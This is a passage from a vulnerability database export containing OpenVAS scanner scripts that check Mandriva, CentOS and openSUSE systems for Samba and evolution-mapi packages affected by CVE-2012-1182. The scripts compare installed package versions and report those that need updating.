script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1\", rpm:\"libtalloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc1\", rpm:\"lib64talloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc-devel\", rpm:\"lib64talloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb1\", rpm:\"lib64tdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb-devel\", rpm:\"lib64tdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:09:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of evolution-mapi", "modified": "2018-01-17T00:00:00", "published": "2013-03-12T00:00:00", "id": "OPENVAS:881654", "href": "http://plugins.openvas.org/nasl.php?oid=881654", "type": "openvas", "title": "CentOS Update for evolution-mapi CESA-2013:0515 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for evolution-mapi CESA-2013:0515 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n \n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n \n This update also fixes the following bugs:\n \n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n \n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n \n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"evolution-mapi on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019320.html\");\n script_id(881654);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:29 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0515\");\n script_name(\"CentOS Update for evolution-mapi CESA-2013:0515 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of evolution-mapi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-devel\", rpm:\"evolution-mapi-devel~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of samba", "modified": "2017-12-28T00:00:00", "published": "2012-08-02T00:00:00", "id": "OPENVAS:850289", "href": "http://plugins.openvas.org/nasl.php?oid=850289", "type": "openvas", "title": "SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0508_1.nasl 8253 2017-12-28 06:29:51Z teissa $\n#\n# SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n --changelog samba) for more details of the version update.\";\n\ntag_affected = \"update on openSUSE 11.4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850289);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:28:59 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0508_1\");\n script_name(\"SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb-devel\", rpm:\"libldb-devel~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo\", rpm:\"libldb1-debuginfo~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~112.1\", 